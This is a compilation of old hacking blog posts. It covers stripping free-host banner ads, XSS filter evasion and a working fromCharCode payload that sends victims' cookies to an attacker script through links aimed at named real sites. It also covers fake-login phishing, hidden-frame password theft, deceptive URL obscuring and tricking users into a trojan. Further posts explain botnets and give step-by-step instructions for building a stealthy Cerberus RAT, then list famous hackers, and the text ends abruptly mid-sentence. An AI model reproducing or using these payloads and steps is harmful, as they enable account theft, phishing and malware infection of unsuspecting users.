now upload that page and view it in a browser. View the source of the page and find where the site added it's banner html. If it came after the <html> and before the <body> then you need to see if it came before or after the  which is in between those. If it is before, then it is the <html> tag that is the key tag which the site adds it's banner after. If it is under the  than you know it puts it after the <body> tag.
So now that we know where the site adds it's banner html what do we do to stop it? We try to make a "fake" tag and hopefully the site adds it's banner html to the fake one instead. Then we use javascript to print the real one. We can do a few things, here is the list:

the basic <noscript> - this used to work, as most banners or popups start with some javascript, but now free sites have gotten smart and automaticly add a </noscript> to stop it.
<noscript>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</noscript>
<keytag> -this keytag is the real one.
<script> , <style> , <xml> - these are a few examples of tags that will make the add on html and javascript of the site's banner not render by the browser. since it is not in the syntax of css, xml or javascript (it is html) user's browsers will just ignore it.
<style>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>
<keytag> -this keytag is the real one.
printing tags with javascript - this one was thought up by acecww and works really well, if you are having problems when you put the real keytag then try using javascript so the site doesn't even see it as the keytag. you get javascript to print the tags one letter at a time.
<script type="javascript">

</script>
<style>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>

If all worked out you should have a page with no annoying popups or flashing banners. If not I guess you will have to play around a little and figure it out for yourself. Since every free host uses different keytags and methods of adding it's banner I can't go over them all one by one.
I decided to go over a real example of a free site that add popup ads or banners to every page you have. I'll be using angelfire since I hate them and because that's the one I picked out of my lucky hat. Just remember that sites can change the way they add banners anytime they feel like, so this method might not work the same way as I am showing. Doing this also breaks the TOS (Terms Of Service) with your host, so you might get your site taken down without any warning. Always have complete backups of your site on your harddrive, espechially if you have a hacking site or are breaking the TOS.
angelfire
------------------------
begin
------------------------
<html>
<head>
<title>testing</title>
</head>
<body>

</noscript>
<script language="JavaScript">

</script>

<p> rest of test page</p>
</body>
</html>
------------------------
end
------------------------
as you can see angelfire puts their ad right after the <body> tag. All they are using to protect us from getting rid of the ad is a </noscript> so.. we can put something like this to defeat the ad:
<style>
<body>
</style>
<body>
So angelfire's server will add the javascript for thier advertisment after the first <body> they see. That will put the ad after <style><body> and before </style>. This means that user's browsers will think that <body> and the angelfires ad is css (cascading style sheet).. which is the <style> tag. Since javascript and html cannot be in css the browser ignores it. We then put the real <body> after this and continue with our site.
About a month after I wrote this I came up with an idea of how to complete remove the advertisments sites put on your pages. I am not 100% sure it will work, but the basic idea is to have a cgi script open all the .html pages in your directory, remove the ad, and write the html back to the .html files. Few things might affect how well this works. First if the script that adds the ad to the .html files is a cron job, but I doubt this, since it would put heavy strain on the system to search and write to all those files. Second, the script might be ran whenever a .html file is editted, I am hoping that it is only ran when a file is created or a file is uploaded. I'll test this out someday, if you want this script come bother me on irc about it and I might finish it =)
Killing Frames
Now I'll go over how to kill frames. The reason you would need this script is to hack namezero, nbci, and other companies which put your page in a frame. Killing a frame means to get rid of it so that your site is the one filling the whole window.
There is one solid way which has always worked for doing this. Not only will it bust out of companies frames.. But if some lamer is leeching your site by using frames this will stop them. The script is as follows:
<script type="javascript">
if (self != top) top.location.replace(self.location);
//-->
</script>
What this script does is checks if the current page is not the top (first) frame, if it isn't then it puts itself as the top frame, deleting the other frame from the browser window. Pretty handy trick =)

Lets say we are entering info to a guestbook. This would be put on the main page of the guestbook. And whenever anyone visited that page we want them to be sent to http://www.lameindustries.org. We would enter this in the guestbook:
<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
Sometimes when you want to use javascript there is some form of filtering going on that stops the <script> tag from being rendered as usual. For those of you who know perl I will demonstrate.
[Line from a perl script that filters input for the <script> tag]
$input = s/<script/<script/ig;
$input is what you submitted to the perl script, what it is doing is looking for <script in your input and replacing it with <script. So how do you get around this? We can use the hex value of any or all characters in <script type="javascript"> the only characters you cannot do this for are the < and the > because they would not be rendered by the browser if you did. So now we enter something like this into the guestbook:
<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
How did I know what the hex value of 's' was? I just checked an ascii chart and added & before it and ; after it. You can use this in the url of your browser as well, just put % before the number. A chart ascii chart is available at www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml or man ascii if you run *nix.
There are a few other situations where javascript can be useful. If you can get around the filter on a users email you can use your spoofing email skills to send an email from someone they trust. If they open it you can have the email redirect them to a page which says something like "session timed out, please login in again" and have that form submitted to a cgi script that logs it. This works for a small percentage of people, but it is worth a shot sometimes.
Getting by javascript filters can lead to you getting cookies for such things as forums, shopping carts, sites, and redirecting users to the site of your choice. Anywhere there is input that is displayed on a page which other people may visit (or you can make them visit) there is an opportunity to use javascript to steal information. Infact just today as I am writing this it was found that lycos and other search engines are vulnerable to javascript in website's descriptions and names, read the slashdot story for more info. This could lead to 100% clicks for any search your site turns up on ;).
Here is a cert advisory concerning insertion of scripts (javascript, vbscript, etc..) inputted into scripts:
http://www.cert.org/advisories/CA-2000-02.html
update: there has been a new advisory for hotmail and other sites which filter javascript. The problem lays in css and the use of the <link> tag. When the following code is used the linked javascript will be executed, making it possible to steal cookies, info, or redirect users to a fake login page.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="script.js">
put that in the body, preferably as the first thing. Of course hotmail patched it days after it was reported, but it stand to show that hotmail is not 100% secure and there will still be ways in the future to get scriptting executed. Also other web based email, guestbook, message boards, etc.. might be vulnerable to this. You can use old hotmail exploits on many other scripts that allow input and print them to a .html file. I found this vulnerability in a script that cyberarmy.com ran for their web based mail, I just did a <script type="javascript"> and redirected the user to a fake login page. When they logged in with their user and password it sent them to a script that wrote their info to a database and then logged them into the web based email script again. The script was made by solutionscripts, and cyberarmy is no longer vulnerable.
Also note that normal text field input is not the only way to insert data into a script. Hidden fields and environment variables are also sometimes vulnerable. Some scripts will filter all the text fields, but will not filter the hidden fields, this allows you to insert javascript or other nasty things. I won't go to much into that since it would require a whole nother tutorial and because writting javascript isn't the first thing you would try to exploit with that. Environment variables that you can exploit are usually referrer or user-agent, since those tend to be the only ones ever written to a file, they are also the least filtered input in my experience. It's much easier to find ways to insert javascript if you can get ahold of the source of the script. There are two easy ways to do this, the first is to see if the script is open source, then go download and review the code for holes. The other is to look for other scripts/exploits that allow you to view the source of other scripts. So do some research for other exploits in other scripts (or the webserver itself).

note: to do this you'll need a little bit of advanced javascript knowledge, and some perl/php/asp (or other server side language).
Stealing cookies can be a dangerous problem for many sites. It all depends on how the site sets up it's security. If a site just uses cookies to identify users than it could be vulnerable. If you need to login then it is almost useless to try and steal cookies. Unless of course the username and passwords are stored in the cookie and is not encrypted. Sometimes you are allowed access without logging in. We will pick on http://neworder.box.sk since they stold some LI tutorials, even though they are not vuln to this because you must login to their site and the user password is not in the cookie. (Lets see if they steal a tutorial which explains how to exploit a hole in one of their scripts ;) How we will be exploiting this bug is simple. Luckily cube left us a vulnerable script on the site to play with. The script is http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.
What is vuln about this script? It doesn't escape the inputted characters that are printed to the page. I told you escaping characters is important. The script instead relies on a simple <pre> tag to stop javascript. So the first thing we must do is test and see what character's (if any) are left unescaped for us to use. After a check for these characters: ' " ; | < > / and % we find that he does escape ' and ". If he didn't we could exploit the php script itself and have total control over the site. I will get to a little trick in a second where we can get javascript to print out ' and ". But for now we must stop that <pre> tag. So we end it with a </pre> then insert any javascript we would like.
In the first paragraph I said that javascript is mostly secure, because it cannot read or write any files off a users hard drive besides cookies. Here we will use javascript to read the user's cookie for neworder and then use javascript to send them to a cgi script where we log their cookie to a txt file. After this we check the log from the cgi script and save the cookie where our browser keeps them. Or we can get the username and password from the cookie and login to the site (neworder doesn't keep the user's password in the cookie).
So now to print the javascript that will steal the cookie. What we are doing is using the script that prints out unescaped characters to the page as if it was javascript that was really on that website. So we can view and edit user cookies. There are two main problems we must overcome. First we need to print a string without using ' and " since the .php script on neworder does escape those characters. How we do this is by using javascript which doesn't need ' or " and prints out any character. This is one way to do it:
<script type=text/javascript> var u = String.fromCharCode(0x0068); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070); u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0073); u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x002E); u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006F); u %2B= String.fromCharCode(0x006D); u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0061); u %2B= String.fromCharCode(0x002E); u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x0067); u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x003F); u %2B= document.cookie; document.location.replace(u); //-->
</script>
We need to use %2B instead of + because + becomes a space when you go to the script. There is probably an easier way of doing this besides using fromCharCode, but I couldn't think of any =) The 0x0068 is ascii for h. 74 is t.. (You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html ):
68=h 74=t 74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e 2E=. 63=c 6F=o 6D=m 2F=/ 61=a 2E=. 63=c 67=g 69=i 3F=? In other words it makes the var u equal to the string http://site.com/a.cgi?
All right, so we got a string in a variable without using ' or ". var u = 'http://site.com/a.cgi?'; would be the same thing if the script didn't filter for ' and ". So now that we got the string going what should we do? Well what we are trying to do is get the cookie in a string and then send them to a cgi script that logs what's in the cookie. document.cookie is the cookie for that site. If there is more than one cookie then you have to use a little trickery. try this page for learning how to handle multiple cookies. Now we need to add the cookie to the end of the url. So:
u %2B= document.cookie;
Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie (but user_s_cookie is actually the value in their cookie). So now we make javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be a cgi script that just logs whatever is inputted to it into a database. Another way to log their cookie would be to put something like:
<img src="http://site.com/somedir/(document.cookie)"> But since this script filters ' and " it would be a really long url to put fromCharCode's for every character.. Also, you would have to have access to the logs of the site in order to check what files were requested from 'somedir' directory.
All cookie stealing techniques require some kind of script on your website to log the cookie when it is sent as a url.
Once you have a user's cookie there are 2 things it can be used for. Sometimes sites put their username and password right in the cookie. In this case you can just log into the site with that. Some other sites just simply use a cookie to authenticate users. No login required.
Take for example www.geocities.com .. If you get a 404 error it will print out the url:
like this
now if you have a cookie of a geocities member you can go to www.geocities.com and you will automatically be logged in. From there you have full control over their account.
But geocities did do something to stop this. They have their website go to http://geocities.yahoo.com .. So the cookie for users is actually a yahoo cookie ;( If you try the same trick where you go to a 404 file on yahoo it won't print the < and > characters. But if you were to find a script on yahoo that printed out < and > you could easily do this =) And there are scripts on yahoo.com which are vuln to cross site scriptting, a few have been reported to bugtraq and I found another one.
So how would you get users to visit these urls? Try things like ...
Yeah all you redlite players, check out this hidden pick, funny as hell: Check this page out! Or better yet.. Load it in a frame that is 0% large. The user won't even know what hit them =)
oh, the source for that redlite link is:
<a href="http://www.redlite.org/signup/signup2.php?username=<script type=text/javascript>var u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B= String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003F);u %2B= document.cookie;document.location.replace(u);</script>" onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true" onMouseOut="window.status='';return true"> Check this page out! </a>
notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true"
and
onMouseOut="window.status='';return true"
at the end.. This is to trick the user into thinking that the link leads somewhere else. Again, using javascript to manipulate what the user sees to help trick them.
Another script in the edge engine that is vulnerable to cross site scriptting is board.php, here is the exploit
http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u); &did=edge0
sure am glad bsrf doesn't run it ;-)
So how can a coder stop this vulnerablitiy? I would say never print user inputted data back to the user. also filter out <, >, and pack all url encoding before filtering input. I found a way to steal cookies in the old ikonboard using the profile.cgi, although it wasn't too big a deal since there was more serious holes in ikonboard it still way bad programming practice to print unfiltered input. Now ikonboard does not use profile.cgi, it doesn't print inputted data to the screen, and it filters data. Usually web based email scripts are very vulnerable to cross site scriptting.. and that holds true for a vulnerability in solution script's alais-mail script that I found last year.
A few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/ - A hotmail exploit. Since hotmail didn't filter javascript and allowed .html attachments to be viewed and not downloaded.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/ - Opening the cookie jar, remote cookie viewer. using %2F instead of / makes ie think it's a intranet site.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp - Actually active scriptting, not javascript.
Then there is the new about:// and file content reading vulns in ie that have been reciently posted to bugtraq.. I plan on discussing these in detail when I update this tutorial.
Most people say to me, "but no one with any clue about security is going to click on the link which has javascript to steal cookies" and this is true. When the plain url is http://site.com/vulnscript.cgi? document.location.relace('http://hacker.com/logger.php?' + document.cookie); That is why we need to trick them into thinking the url isn't dangerous. Here is one way:
obscuring urls:
One way of tricking a user into clicking a link they thought lead somewhere else was to use that onmouseover trick to make the url look like it is pointting somewhere else. Obviously you cannot use this while on protocols that do not support html or that completely block javascript and onmouseover. So instead of http://site.com you can have http://127.0.0.1 this might not help too much so how about we use alittle trick. When browsers login to .htaccess directories they can use the following syntax:
http://username: password@site.com
You'll see why this is important in a minute. Without the password you can have things like:
http:// username@site.com
and it will work fine. It will try to login to site.com with the username = 'username' and no password. Now what happends if there is no .htaccess file? Then it doesn't matter what the username or password is, and the page loads normal. So something like this could be used:
http://microsoft.com/site/dir/ helpdesk.asp@site.com
You see how this could be used to get people to click on a link thinking it leads somewhere else? Even if it is in plain text many people will beleive this link goes to microsoft.com. Now that we have a link lets obscure it a bit =)
There are many different ways to obscure urls from users to help aid you into tricking them. One of them involves converting ip addresses into their decimal equivilants. I am not going to cover this, but there are plenty of other tutorials on the net where you can learn. I'll just let you use this script to automaticly convert ip addresses to the decimal value.
IPa IPb IPc IPd =
Now use this instead of site.com and you get something like:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F [insert nasty javascript url encoded here]
now that does not look like http://site.com/a.cgi? nasty javascript
which would be very clear for users to tell what it is doing. Lets go over the steps one more time, just to be sure you got it. First make up any site name (doesn't have to be valid url)
http://aol.com/scripts/userid.jsp?
Add a @ to the end
http://aol.com/scripts/userid.jsp?@
Then the ip address of the host in decimal form
http://aol.com/scripts/userid.jsp?@3639550308
then the rest of the path in urlencoding.
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
Also url encode the javascript and put it at the end. This is just one method of obscuring the url, there are others.

Ok, this method will not be used very often, and isn't too valuable a skill to the average hacker.. But it can come in very handy. This was originally a news post on my site, but it fits into this tutorial nicely. I know that this part might be very poorly explained and many people won't understand how it works. But I have tried to atleast make it so people with advanced javascript knowledge can make some sense of how the attack works. Also note that this attack is purely theory, I have not used this against an actual site yet. It might even be used against sites which require you to fill in a form to login, this means hotmail, yahoo, and 100,000,000 other sites, but it would require extra coding, some of which I am not sure if it is possible.
Ok, in this article I will explain how to steal info from users by using javascript.
What this exploit requires is: A script that prints info you want into an input field.
The script doesn't check the referrer.
The most used reason for this would be to get usernames and passwords from sites. An example of this would be cyberarmy.com which was vulnerable to this for along time. You will notice that if we did have the user's cookie that we could have simply viewed this page and gotten their password, but cyberarmy was pretty secure in not printing unescaped data to the user's browser.
Now we will be doing this:
1 main page with 2 frames.
frame #1 - will look like a normal page and will steal the info from frame #2.
frame #2 - will load the page in a hidden frame.
this is what the main page will look like:
-------- begin --------
<html>
<script language="JavaScript"><script language="javascript">');
window.vulnscript.document.writeln('location.replace(http://www.cyberarmy.com/zebulun/userconfig.pl);');
window.vulnscript.document.writeln('<\/script>
</script>
</html>
-------- end --------
of course in real use the size of the cols would be set so frame #2 (vulnscript) would be 0%.. So that the user wouldn't even know what is happening.
Now this is what the fuckca.html is:
-------- begin --------
<html><body>
<script type="text/javascript">

</script>
</body></html>
-------- end --------
all this does is print out the value of the first (unnamed) form from the frame named vulnscript (the one that has the page where we want to steal data from).
This is what their userconfig.pl displayed that we were grabbing:
Password : <INPUT TYPE="password" SIZE=45 NAME="pass1" MAXLENGTH=16 value="testpass">
The problem is that it would display the password in plain text (value="testpass" - testpass is the password) why it did this I don't know, stupid programming I guess. But if you got a hold of someone's cookie you could view that script and it would give you the pass.. So what this little trick with frames and javascript does is make users visit the page without knowing and then lets our javascript grab their password. Instead of printing the password to frame #1 (name=blah) we could have sent an invisible frame to a script which logs input. Example:
instead of
parent.blah.document.write(name1);
have
parent.vulnscript.location.replace(log.cgi?name1);
I would then tell a few people who I want passwords from about this page, say "hey, want to see a picture of my girlfriend?" (All hackX0r guys like pics of girls) then I would just put up some stupid pic.. Maybe Britney Spears or something. The log.cgi would log both name1 (their password) and $ENV{'REMOTE_ADDR'} (their ip address). This would let me match up usernames to passwords fairly easy. You could also get their username from grabbing it off the page, or from the contents of the cookie.
This attack is fairly complicated, so I didn't explain why I did a few things. I figure anyone who could actually pull this off would understand why. Also not many sites are vuln to this, and even the ones that are usually the attacker does not have the ability to hop on the irc channel and trick people into viewing it.

Ok, this is probably the least likely technique in this tutorial to be used. All the rest can be used fairly often. This one is used to gain enough info on someone in order to form a trojan attack on them. What this javascript will allow us to do is to probe their system and see if they have any security against our attack. It will let us see what anti-virus program they use, what firewall they use, and if they have any programs that allow us to infect them with macros.
This was originally a bugtraq post: ( http://www.securityfocus.com/archive/1/224673 ) with a link to the example at http://geocities.com/dzzie/sys_snoop1.html but we are going to probe for more security related programs. (put a probe for anti-virus programs, firewalls, word, adobe acrobat [pdf])
Lets say we check for anti-virus programs, if they don't have any you can display a link to download sub7 and say it is a video game... if they do have an anti-virus program you can display the link to the real game. This way you don't have to worry about the user finding out that you tried to send them a trojan. Only users who don't have an anti-virus program will have downloaded the trojan.
One possible future for trojan's is modules that you can insert to attack specific programs. For instance if you know the user is running a certain type of anti-virus program and they are running a certain type of firewall you can plug those modules into the trojan. When the user downloads and runs this trojan the modules will trojan those anti-virus and firewall making them seem as if they are running fine, when they aren't. Ether they won't detect your trojan or they will replace them with a emtpy program that just puts the icons in the taskbar and task list. I will try to get a working deminstration of how javascript can be used to download the correct trojan for a user's system or detect if the trojan will be detected by an anti-virus program so it will make them download a regular file.
If you have a firewall or anti-virus program please send me the full address (absolute address) to all the images it has. email th

BOTNET

2011-04-08T00:08:00.003-07:00

botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.
Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.
A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)
There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots

These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.

Malicious Uses of Botnets

A botnet can have a lot of malicious applications. Among the most popular uses of botnets are the following:

Denial of Service Attacks

A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spamming and Traffic Monitoring

A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.
Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Keylogging and Mass Identity Theft

An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.
Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread

Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse

Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.

RAT

2011-04-08T00:08:00.001-07:00

The RAT (Remote Administration Tool)

In this post we will learn how to create Remote Administration Tool(RAT). But before we proceed let's discus some basic terminologies.

Trojan: Trojan horse or Trojan is a malware that appears to perform a desirable function for the user prior to run or but instead facilitates unauthorized access of the user's computer system. It is harmful software/ that appears legitimate. They come packed with some other piece of code or software and hence users get tricked to run them. The term Trojan has been derived from the Trojan Horse from Greek Mythology.

Types Of Trojan:

1.Remote Access Tool (RAT)

2.Proxy

3.File Sending Trojan

4.Security Disable rs

5.Denial Of Service (DOS)

6.File Sending Trojans(FTP Trojan)

7.Destructive Trojans

Remote Access Tool(RAT): Remote Administration Tool also known as RAT is used to remotely connect and manage single or multiple computers. RAT is one of the most dangerous Trojan because it compromises features of all types of Trojans. It provides an attacker with nearly unlimited access to host computer along with Screen Capture, File management, shell control and device control. RATs uses reverse connections to connect remote system and hence are more likely to remain undetected. They can hide themselves in process space of legitimate program and hence never appear in task manager or system monitors.

A Trojan generally has two parts Client and Server or Master and Slave. We can say Server is Slave and Client is Master. So a server side is on a remote host and the attacker manipulates it with client software. In olden days making a Trojan was a job of master programmer but now a days several Trojan building tools are available. Most of them usually have same kinda interface so its quite easy to use any Trojan client once you have used any one of them . Following is list of some well known Trojans and Trojan Building Tools,

1.Casa RAT

2.Back Orifice

3.Bandook RAT

4.Dark Comet Rat

5.Cerberus

6.Cybergate

7.Blackshades

8.Poison Ivy

9.Schwarze Sonne RAT

10.Syndrome RAT

11.Team Viewer

12.Y3k RAT

13Snoopy

15.5p00f3r.N$ RAT

16.NetBus

17.SpyNet

18.P. Storrie RAT

19.Turkojan Gold

20.Bifrost

21.Lost Door

22.Beast

23.Shark

24.Sub7

25.Pain RAT

26.xHacker Pro RAT

27.Seed RAT

28.Optix Pro RAT

29.Dark Moon

30.NetDevil

31.Deeper RAT

32.MiniMo RAT

If you think the list is very big then I must tell you it's not complete nor it covered 25% of RAT building tools.

Demonstration: How to create a RAT:Since there are several tools available and most of them have same kinda interface we can select any RAT building tool for demonstration. So here we select Cerberus Client to demonstrate working of RAT. Please note that using RAT for hacking is crime please take this demonstration for educational purpose only.

Type “Download Cerberus RAT” in Google search and download Cerberus RAT. Execute Cerberus file and launch program. Accept EULA and following interface will be launched in front of you.

To create server press new button.

As you can see there are several options are available in settings but for our demonstration we will use most common settings. In “Basic Option” type your IP address and then press “+”. In identification name of the server from which your client will identify to which server it's , this name is given for your client to identify connection. No need to specify what to put in connection password. Specify the port on which you'll like to listen. Please keep note of this port since you'll have to configure client settings to receive information on this port.

The next option is “Server Installation”. From “Directory Installation” you can select where and in which name your RAT server will be installed. In “File Name” option you have to specify name and extension of your server. Boot Methods gives you option to start your server as “System Service” or “User Application” take your pick or leave them untouched. “Anti-Debugging” function allows your RAT to bypass Virtualisation and Sandboxing.

From “Misc Options” you can activate key logging feature as well as you can select how your RAT can hide itself in another process.

“Display Message” option gives you power to show custom message on victim's computer.

“Black List Item” option allows to set logic for execution of your RAT server with respect to specific process and service. Mostly only advanced users use this feature.

“Overview” allows you look of features of your RAT. Now select an icon and press create server to create server.

Now the add file function allows you to bind your RAT with any legitimate file most probable is an executable file. To avoid detection don't use custom message box and UN-check “Run in Visible Mode” option while creating server.

Configuring To Listen On Client: To configure Cerberus to listen on specific port select options and put “Connection Password” and “Connection Ports” that were specified in Server. Wait for victim to execute server and then just right on listening server and play with options.

Following is video demonstration to above procedures and methods described to create RAT using Cerberus Client.

TOP 10 BEST EVER HACKERS

2011-04-08T00:07:00.004-07:00

The good computer hackers are similar to war veterans in that they spend hours talking about how great the scene used to be “back in the day”. I first heard similar stories way back in 1995 but today it is actually somewhat true as the final HOPE conference has now been held, Black Hat is now a corporate event, the good e-zines are long gone and hacking is now associated with Russian crime gangs.
Now is a good time to go back and list the top 10 hackers who shaped both the computer and security industries and who have left their mark.
1. Shawn Fanning – What was once an IRC handle became synonymous with the free exchange of music files. Along with Jordan Ritter and Shaun Parker changed the music industry forever and set the course for the next decade of online media. Managed to turn a cool rock metal band into a bunch of whining babies and had his high moment when he appeared on the MTV music awards wearing a Metallic t-shirt. ADM were also the best and most consistent group ever (wikipedia).
2. Robert Morris – Discovered the buffer overflow and exploited both sendmail and fingerd with the first ever internet worm – now known as the Morris Worm. Went on to become a co-founder of ViaWeb with Paul Graham. Downside is that his story was responsible for Dade Murphy and the Gibson OS, but it also bought us Angelina Jolie. (wikipedia)
3. VallaH - jolt.c and the ping-of-death kept kids around the world amused for years and big corporations on their knees. The first smart denial-of-service attack.
4. Gordon Lyon / Fyodor – Created Nmap, the
first tool in every hackers arsenal that has since gone on to make cameo appearances in both The Matrix and the Bourne Ultimatum. Nmap pioneered OS and service fingerprinting. Also behind insecure.org. (wikipedia)
5. Kevin Mitnick – Most famous real-life hacker who could have used a few tips on how cellular triangulation works. Imprisoned by the government without charge for years and restricted with a gag order thereafter. FREE KEVIN became a hacker freedom call for years. (wikipedia)
6. The Mentor – Wrote the Hacker Manifesto which was published in Phrack magazine. Inspired kids worldwide to hack to learn (myself included). Phrack magazine deserves a mention as it was the best and most consistant e-zine in the past two decades. Ran for 65 issues until 2005.
7. Karl Koch / August Diehl – German hacker in the 80s who drove himself insane with cocaine abuse, obsession over the number 23 and paranoia over the Illuminatus. (wikipedia)
8. Electron / Richard Jones – Aussie kid who wrecked havoc all over the world with nothing more than a modem. Arrested by the Australian Federal Police in 1990. Went on to become a security researcher and consultant.
9. Kevin Poulson / Dark Dante – Phreaked his way to a new Porsche with a radio contest on an LA station. Arrested and jailed and went on to become a journalist and editor at Wired. (wikipedia)
10. Adrian Lamo – showed the world (literally) that you can take down large websites with just URLs (such as Worldcom). Now also a journalist. (wikipedia)
What is amazing is just how many of the same guys who used to sit on IRC day and night discovering security holes and breaking into servers for fun ended up shaping and influencing the IT industry as a whole. There are hundreds of thousands of hackers who you have never heard about, mostly because they never got caught, who went on to start companies and attain high positions within corporations.

How to become hacker!

2011-04-08T00:07:00.002-07:00

How To Become A Hacker

Why This Document?

